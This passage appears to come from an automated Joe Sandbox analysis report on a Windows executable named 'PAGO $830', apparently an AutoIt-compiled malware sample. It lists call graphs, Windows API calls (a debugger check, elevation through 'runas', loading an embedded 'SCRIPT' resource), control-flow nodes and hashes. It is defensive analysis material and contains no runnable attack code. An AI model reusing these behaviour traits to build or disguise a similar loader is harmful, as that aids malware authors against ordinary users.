calls 93808->93809 93810 d73484 93809->93810 93811 d7c25d 22 API calls 93810->93811 93812 d7348f 93811->93812 93813 d8fd5b 22 API calls 93812->93813 93814 d734a1 RegisterWindowMessageW 93813->93814 93814->93765 93816 d733c6 93815->93816 93817 db32b9 93815->93817 93818 d8fd5b 22 API calls 93816->93818 93831 de3127 23 API calls 93817->93831 93821 d733ce 93818->93821 93820 db32c4 93821->93771 93822->93780 93823->93782 93832 de0848 28 API calls 93823->93832 93825 d7c25d 22 API calls 93824->93825 93826 d72d07 93825->93826 93827 d7c25d 22 API calls 93826->93827 93828 d72d0f 93827->93828 93829 d7c25d 22 API calls 93828->93829 93830 d72cd1 93829->93830 93830->93787 93831->93820 93833 13c0e08 93847 13bea58 93833->93847 93835 13c0ed1 93850 13c0cf8 93835->93850 93853 13c1ef8 GetPEB 93847->93853 93849 13bf0e3 93849->93835 93851 13c0d01 Sleep 93850->93851 93852 13c0d0f 93851->93852 93854 13c1f22 93853->93854 93854->93849 93855 d74b81 93858 d74b9b 93855->93858 93859 d74bb2 93858->93859 93860 d74bb7 93859->93860 93861 d74c16 93859->93861 93898 d74c14 93859->93898 93865 d74bc4 93860->93865 93866 d74c90 PostQuitMessage 93860->93866 93863 db39dd 93861->93863 93864 d74c1c 93861->93864 93862 d74bfb DefWindowProcW 93900 d74b95 93862->93900 93907 d731ed 10 API calls 93863->93907 93867 d74c23 93864->93867 93868 d74c48 SetTimer RegisterWindowMessageW 93864->93868 93870 db3a5e 93865->93870 93871 d74bcf 93865->93871 93866->93900 93872 db397e 93867->93872 93873 d74c2c KillTimer 93867->93873 93875 d74c71 CreatePopupMenu 93868->93875 93868->93900 93912 ddbe4e 34 API calls ___scrt_fastfail 93870->93912 93876 db3a4a 93871->93876 93877 d74bd9 93871->93877 93879 db39b9 MoveWindow 93872->93879 93880 db3983 93872->93880 93903 d74b1d Shell_NotifyIconW ___scrt_fastfail 93873->93903 93874 db39fe 93908 d8e48c 42 API calls 93874->93908 93875->93900 93911 ddc07f 27 API calls ___scrt_fastfail 93876->93911 93884 d74be4 93877->93884 93885 db3a2f 93877->93885 93879->93900 93887 db3989 93880->93887 93888 db39a8 SetFocus 93880->93888 93891 d74bef 93884->93891 93892 d74c7e 93884->93892 93885->93862 93910 dd0a1b 22 API calls 93885->93910 93886 db3a70 93886->93862 93886->93900 93887->93891 93893 db3992 93887->93893 93888->93900 93889 d74c3f 93904 d75adb DeleteObject DestroyWindow 93889->93904 93890 d74c8e 93890->93900 93891->93862 93909 d74b1d Shell_NotifyIconW ___scrt_fastfail 93891->93909 93905 d74c9a 44 API calls ___scrt_fastfail 93892->93905 93906 d731ed 10 API calls 93893->93906 93898->93862 93901 db3a23 93902 d756c2 49 API calls 93901->93902 93902->93898 93903->93889 93904->93900 93905->93890 93906->93900 93907->93874 93908->93891 93909->93901 93910->93898 93911->93890 93912->93886 93913 d7f6c0 93916 d7c315 93913->93916 93915 d7f6cc 93917 d7c336 93916->93917 93919 d7c38b 93916->93919 93917->93919 93921 d7c3ba 93917->93921 93923 d7c5e7 23 API calls messages 93917->93923 93919->93921 93924 de34ba 82 API calls __wsopen_s 93919->93924 93920 dc04e2 93920->93920 93921->93915 93923->93919 93924->93920 93925 da83a2 93930 da815e 93925->93930 93927 da83ca 93935 da818f try_get_first_available_module 93930->93935 93932 da838e 93949 da277c 26 API calls _strftime 93932->93949 93934 da82e3 93934->93927 93942 db0925 93934->93942 93938 da82d8 93935->93938 93945 d98d9b 40 API calls 2 library calls 93935->93945 93937 da832c 93937->93938 93946 d98d9b 40 API calls 2 library calls 93937->93946 93938->93934 93948 d9f269 20 API calls _abort 93938->93948 93940 da834b 93940->93938 93947 d98d9b 40 API calls 2 library calls 93940->93947 93950 db0022 93942->93950 93944 db0940 93944->93927 93945->93937 93946->93940 93947->93938 93948->93932 93949->93934 93952 db002e ___scrt_is_nonwritable_in_current_image 93950->93952 93951 db003c 94008 d9f269 20 API calls _abort 93951->94008 93952->93951 93954 db0075 93952->93954 93961 db05fc 93954->93961 93955 db0041 94009 da277c 26 API calls _strftime 93955->94009 93960 db004b __fread_nolock 93960->93944 94011 db03d0 93961->94011 93964 db062e 94043 d9f256 20 API calls _abort 93964->94043 93965 db0647 94029 da51b1 93965->94029 93968 db064c 93969 db066c 93968->93969 93970 db0655 93968->93970 94042 db033b CreateFileW 93969->94042 94045 d9f256 20 API calls _abort 93970->94045 93974 db065a 94046 d9f269 20 API calls _abort 93974->94046 93975 db0722 GetFileType 93980 db072d GetLastError 93975->93980 93981 db0774 93975->93981 93976 db06a5 93976->93975 93979 db06f7 GetLastError 93976->93979 94047 db033b CreateFileW 93976->94047 93977 db0099 94010 db00c2 LeaveCriticalSection __wsopen_s 93977->94010 94048 d9f233 20 API calls __dosmaperr 93979->94048 94049 d9f233 20 API calls __dosmaperr 93980->94049 94051 da50fa 21 API calls 2 library calls 93981->94051 93982 db0633 94044 d9f269 20 API calls _abort 93982->94044 93986 db073b CloseHandle 93986->93982 93989 db0764 93986->93989 93988 db06ea 93988->93975 93988->93979 94050 d9f269 20 API calls _abort 93989->94050 93991 db0795 93993 db07e1 93991->93993 94052 db054c 72 API calls 3 library calls 93991->94052 93992 db0769 93992->93982 93997 db080e 93993->93997 94053 db00ee 72 API calls 4 library calls 93993->94053 93996 db0807 93996->93997 93998 db081f 93996->93998 93999 da864e __wsopen_s 29 API calls 93997->93999 93998->93977 94000 db089d CloseHandle 93998->94000 93999->93977 94054 db033b CreateFileW 94000->94054 94002 db08c8 94003 db08d2 GetLastError 94002->94003 94004 db08fe 94002->94004 94055 d9f233 20 API calls __dosmaperr 94003->94055 94004->93977 94006 db08de 94056 da52c3 21 API calls 2 library calls 94006->94056 94008->93955 94009->93960 94010->93960 94012 db040b 94011->94012 94013 db03f1 94011->94013 94057 db0360 94012->94057 94013->94012 94064 d9f269 20 API calls _abort 94013->94064 94016 db0400 94065 da277c 26 API calls _strftime 94016->94065 94018 db0443 94019 db0472 94018->94019 94066 d9f269 20 API calls _abort 94018->94066 94027 db04c5 94019->94027 94068 d9d69d 26 API calls 2 library calls 94019->94068 94022 db04c0 94024 db053f 94022->94024 94022->94027 94023 db0467 94067 da277c 26 API calls _strftime 94023->94067 94069 da278c 11 API calls _abort 94024->94069 94027->93964 94027->93965 94028 db054b 94030 da51bd ___scrt_is_nonwritable_in_current_image 94029->94030 94072 da2eee EnterCriticalSection 94030->94072 94032 da51e9 94035 da4f90 __wsopen_s 21 API calls 94032->94035 94033 da51c4 94033->94032 94037 da5257 EnterCriticalSection 94033->94037 94040 da520b 94033->94040 94036 da51ee 94035->94036 94036->94040 94076 da50d7 EnterCriticalSection 94036->94076 94039 da5264 LeaveCriticalSection 94037->94039 94037->94040 94038 da5234 __fread_nolock 94038->93968 94039->94033 94073 da52ba 94040->94073 94042->93976 94043->93982 94044->93977 94045->93974 94046->93982 94047->93988 94048->93982 94049->93986 94050->93992 94051->93991 94052->93993 94053->93996 94054->94002 94055->94006 94056->94004 94060 db0378 94057->94060 94058 db0393 94058->94018 94060->94058 94070 d9f269 20 API calls _abort 94060->94070 94061 db03b7 94071 da277c 26 API calls _strftime 94061->94071 94063 db03c2 94063->94018 94064->94016 94065->94012 94066->94023 94067->94019 94068->94022 94069->94028 94070->94061 94071->94063 94072->94033 94077 da2f36 LeaveCriticalSection 94073->94077 94075 da52c1 94075->94038 94076->94040 94077->94075

                                                          Executed Functions

                                                          Function 00D7615E Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 234 d7615e-d761cd call d7c25d GetVersionExW call d784e7 239 d761d3 234->239 240 db434e-db4361 234->240 241 d761d5-d761d7 239->241 242 db4362-db4366 240->242 243 db438d 241->243 244 d761dd-d7623c call d7ad22 call d7562b 241->244 245 db4369-db4375 242->245 246 db4368 242->246 250 db4394-db4397 243->250 263 d76242-d76244 244->263 264 db4516-db451d 244->264 245->242 247 db4377-db4379 245->247 246->245 247->241 249 db437f-db4386 247->249 249->240 252 db4388 249->252 253 db439d-db43df 250->253 254 d7629b-d762b5 GetCurrentProcess IsWow64Process 250->254 252->243 253->254 258 db43e5-db43e8 253->258 256 d762b7 254->256 257 d76314-d7631a 254->257 260 d762bd-d762c9 256->260 257->260 261 db43ea-db43f4 258->261 262 db4412-db441c 258->262 265 db455b-db455f GetSystemInfo 260->265 266 d762cf-d762de LoadLibraryA 260->266 267 db4401-db440d 261->267 268 db43f6-db43fc 261->268 270 db442f-db4439 262->270 271 db441e-db442a 262->271 263->250 269 d7624a-d7625d 263->269 272 db451f 264->272 273 db453d-db4540 264->273 276 d762e0-d762ee GetProcAddress 266->276 277 d7631c-d76326 GetSystemInfo 266->277 267->254 268->254 278 d76263-d76265 269->278 279 db445d-db4466 269->279 281 db443b-db4447 270->281 282 db444c-db4458 270->282 271->254 280 db4525 272->280 274 db452b-db4533 273->274 275 db4542-db4551 273->275 274->273 275->280 285 db4553-db4559 275->285 276->277 286 d762f0-d762f4 GetNativeSystemInfo 276->286 287 d762f6-d762f8 277->287 288 d7626b-d7626e 278->288 289 db4484-db4499 278->289 283 db4468-db446e 279->283 284 db4473-db447f 279->284 280->274 281->254 282->254 283->254 284->254 285->274 286->287 292 d76301-d76313 287->292 293 d762fa-d762fb FreeLibrary 287->293 294 db44c8-db44cb 288->294 295 d76274-d7628f 288->295 290 db449b-db44a1 289->290 291 db44a6-db44b2 289->291 290->254 291->254 293->292 294->254 298 db44d1-db44f8 294->298 296 d76295 295->296 297 db44b7-db44c3 295->297 296->254 297->254 299 db44fa-db4500 298->299 300 db4505-db4511 298->300 299->254 300->254
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00D7618D
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • GetCurrentProcess.KERNEL32(?,00E0D030,00000000,?,?), ref: 00D762A2
                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D762A9
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D762D4
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D762E6
                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D762F4
                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D762FB
                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 00D76320
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                          • API String ID: 3290436268-3101561225
                                                          • Opcode ID: 78d03f3a7df0328cd2a998b9879b3af4f9dc7d1c9a3a3f134fdd3fddf81e1914
                                                          • Instruction ID: 2622655ac83ff8dc57a73eef2bdd1cc7e37a72dd93bc1de0501769a8b668118b
                                                          • Opcode Fuzzy Hash: 78d03f3a7df0328cd2a998b9879b3af4f9dc7d1c9a3a3f134fdd3fddf81e1914
                                                          • Instruction Fuzzy Hash: 31A1542A90A7C0CFCF11CFAA7C441D57FA46B67344B1A58E9E48573A27F260858ECB35
                                                          Function 00D7445D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D736D8,?), ref: 00D7448D
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D736D8,?), ref: 00D744A0
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E41418,00E41400,?,?,?,?,?,?,00D736D8,?), ref: 00D74515
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                            • Part of subcall function 00D736FB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D7453D,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00D7373C
                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00D74596
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E359B8,00000010), ref: 00DB371C
                                                          • SetCurrentDirectoryW.KERNEL32(?,00E41418,?,?,?,?,?,?,?,00D736D8,?), ref: 00DB3769
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E32244,00E41418,?,?,?,?,?,?,?,00D736D8), ref: 00DB37F2
                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DB37F9
                                                            • Part of subcall function 00D745AE: GetSysColorBrush.USER32(0000000F), ref: 00D745B9
                                                            • Part of subcall function 00D745AE: LoadCursorW.USER32(00000000,00007F00), ref: 00D745C8
                                                            • Part of subcall function 00D745AE: LoadIconW.USER32(00000063), ref: 00D745DE
                                                            • Part of subcall function 00D745AE: LoadIconW.USER32(000000A4), ref: 00D745F0
                                                            • Part of subcall function 00D745AE: LoadIconW.USER32(000000A2), ref: 00D74602
                                                            • Part of subcall function 00D745AE: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D7461A
                                                            • Part of subcall function 00D745AE: RegisterClassExW.USER32(?), ref: 00D7466B
                                                            • Part of subcall function 00D7468E: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D746BC
                                                            • Part of subcall function 00D7468E: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D746DD
                                                            • Part of subcall function 00D7468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746F1
                                                            • Part of subcall function 00D7468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746FA
                                                            • Part of subcall function 00D756C2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D75793
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                          • String ID: This is a third-party compiled AutoIt script.$runas$Y
                                                          • API String ID: 683915450-3870070793
                                                          • Opcode ID: 622ff47ef4ce70fa9bf0dbd6abab05fa3e6b8d13b8ab5d350b93348f22e5204d
                                                          • Instruction ID: 18bb15fde16b3a8a1a60db08dcbaea0304257f06e2b3de827345c2013181d4cc
                                                          • Opcode Fuzzy Hash: 622ff47ef4ce70fa9bf0dbd6abab05fa3e6b8d13b8ab5d350b93348f22e5204d
                                                          • Instruction Fuzzy Hash: A5512975108341AFCB11EF61EC069BE7BA8DB85750F44455DF495621A2EF20898EDB32
                                                          Function 00D76122 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1336 d76122-d7613a CreateStreamOnHGlobal 1337 d7613c-d76153 FindResourceExW 1336->1337 1338 d7615a-d7615d 1336->1338 1339 db42f1-db4300 LoadResource 1337->1339 1340 d76159 1337->1340 1339->1340 1341 db4306-db4314 SizeofResource 1339->1341 1340->1338 1341->1340 1342 db431a-db4325 LockResource 1341->1342 1342->1340 1343 db432b-db4333 1342->1343 1344 db4337-db4349 1343->1344 1344->1340
                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00D76A4A,?,?,00000000,00000000), ref: 00D76132
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D76A4A,?,?,00000000,00000000), ref: 00D76149
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00D76A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D768C2), ref: 00DB42F5
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00D76A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D768C2), ref: 00DB430A
                                                          • LockResource.KERNEL32(00D76A4A,?,?,00D76A4A,?,?,00000000,00000000,?,?,?,?,?,?,00D768C2,?), ref: 00DB431D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: b72cb6e6937f26175471539222f09d4b3cd37278fd3eeec876d230d6f9142c03
                                                          • Instruction ID: 789fc523996cc0fc62ba0056a71e1b57ff344252fba809ae753a9b5660e676e2
                                                          • Opcode Fuzzy Hash: b72cb6e6937f26175471539222f09d4b3cd37278fd3eeec876d230d6f9142c03
                                                          • Instruction Fuzzy Hash: 7A11A070200B01BFD7218B66DC49F277BB9EBC5B41F24862CB50AA66A1EB71DC408631
                                                          Function 00DDDADC Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00DB5DF8), ref: 00DDDAEC
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00DDDAFB
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00DDDB0C
                                                          • FindClose.KERNEL32(00000000), ref: 00DDDB18
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                          • String ID:
                                                          • API String ID: 2695905019-0
                                                          • Opcode ID: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                                          • Instruction ID: 7c150a6f16d20d0c12cf6d5a4405fd71de4af4f15ec342973663252198b1b124
                                                          • Opcode Fuzzy Hash: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                                          • Instruction Fuzzy Hash: 20F0A032410A105BC61067B8AC0DCAA3ABDDF02338B254707F875D26F1D771999846A5
                                                          Function 00D7F054 Relevance: 21.6, APIs: 14, Instructions: 611windowsleeptimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetInputState.USER32 ref: 00D7F107
                                                          • timeGetTime.WINMM ref: 00D7F307
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7F428
                                                          • TranslateMessage.USER32(?), ref: 00D7F47B
                                                          • DispatchMessageW.USER32(?), ref: 00D7F489
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7F49F
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00D7F4B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                          • String ID:
                                                          • API String ID: 2189390790-0
                                                          • Opcode ID: 4d6d202616a7d9f3fd289067ec534649d521c357378cf1050efec589f68cf4db
                                                          • Instruction ID: 8170bccc7238e01a02f3d271ceae8eca903c9d6960c306cf697f16f4d59e5f40
                                                          • Opcode Fuzzy Hash: 4d6d202616a7d9f3fd289067ec534649d521c357378cf1050efec589f68cf4db
                                                          • Instruction Fuzzy Hash: A732CF70604342AFD734DB24C844FAAB7E1BF45304F58C62DE59997291E770E984CBB2
                                                          Function 00D746FF Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00D74732
                                                          • RegisterClassExW.USER32(00000030), ref: 00D7475C
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D7476D
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00D7478A
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D7479A
                                                          • LoadIconW.USER32(000000A9), ref: 00D747B0
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D747BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 793b47659d0fd7e10026aa026322fb579bad69a215f5faaedaada7992df4561a
                                                          • Instruction ID: 5d8220572719a17ab3814d2529bb2d158b55c0ec471e28d2526149f0db9d6b63
                                                          • Opcode Fuzzy Hash: 793b47659d0fd7e10026aa026322fb579bad69a215f5faaedaada7992df4561a
                                                          • Instruction Fuzzy Hash: 9921C3B5901318AFDF00DFA6E849BDDBBB4FB49701F10825AF611B62A0D7B14589CF91
                                                          Function 00DB05FC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 368 db05fc-db062c call db03d0 371 db062e-db0639 call d9f256 368->371 372 db0647-db0653 call da51b1 368->372 377 db063b-db0642 call d9f269 371->377 378 db066c-db06b5 call db033b 372->378 379 db0655-db066a call d9f256 call d9f269 372->379 388 db091e-db0924 377->388 386 db0722-db072b GetFileType 378->386 387 db06b7-db06c0 378->387 379->377 392 db072d-db075e GetLastError call d9f233 CloseHandle 386->392 393 db0774-db0777 386->393 390 db06c2-db06c6 387->390 391 db06f7-db071d GetLastError call d9f233 387->391 390->391 397 db06c8-db06f5 call db033b 390->397 391->377 392->377 407 db0764-db076f call d9f269 392->407 395 db0779-db077e 393->395 396 db0780-db0786 393->396 400 db078a-db07d8 call da50fa 395->400 396->400 401 db0788 396->401 397->386 397->391 411 db07da-db07e6 call db054c 400->411 412 db07e8-db080c call db00ee 400->412 401->400 407->377 411->412 417 db0810-db081a call da864e 411->417 418 db081f-db0862 412->418 419 db080e 412->419 417->388 421 db0883-db0891 418->421 422 db0864-db0868 418->422 419->417 425 db091c 421->425 426 db0897-db089b 421->426 422->421 424 db086a-db087e 422->424 424->421 425->388 426->425 427 db089d-db08d0 CloseHandle call db033b 426->427 430 db08d2-db08fe GetLastError call d9f233 call da52c3 427->430 431 db0904-db0918 427->431 430->431 431->425
                                                          APIs
                                                            • Part of subcall function 00DB033B: CreateFileW.KERNELBASE(00000000,00000000,?,00DB06A5,?,?,00000000,?,00DB06A5,00000000,0000000C), ref: 00DB0358
                                                          • GetLastError.KERNEL32 ref: 00DB0710
                                                          • __dosmaperr.LIBCMT ref: 00DB0717
                                                          • GetFileType.KERNELBASE(00000000), ref: 00DB0723
                                                          • GetLastError.KERNEL32 ref: 00DB072D
                                                          • __dosmaperr.LIBCMT ref: 00DB0736
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DB0756
                                                          • CloseHandle.KERNEL32(?), ref: 00DB08A0
                                                          • GetLastError.KERNEL32 ref: 00DB08D2
                                                          • __dosmaperr.LIBCMT ref: 00DB08D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: ea210d3378d70b1becb3bc0f9037949f00cac1a6b7aff7bcacde6c1af3b3cdcb
                                                          • Instruction ID: c76e3f12c377fd9a37f2665ad5c09311ee8bf5ce907d4b30c77fa20468addebd
                                                          • Opcode Fuzzy Hash: ea210d3378d70b1becb3bc0f9037949f00cac1a6b7aff7bcacde6c1af3b3cdcb
                                                          • Instruction Fuzzy Hash: 9EA10736A141449FDF19AF68D851BEE7FA0EB06320F180159F812EB391DB359917CBB1
                                                          Function 00D7533E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00D758E5: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D748AA,?,?,?,00000000), ref: 00D75903
                                                            • Part of subcall function 00D74D82: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D74DA4
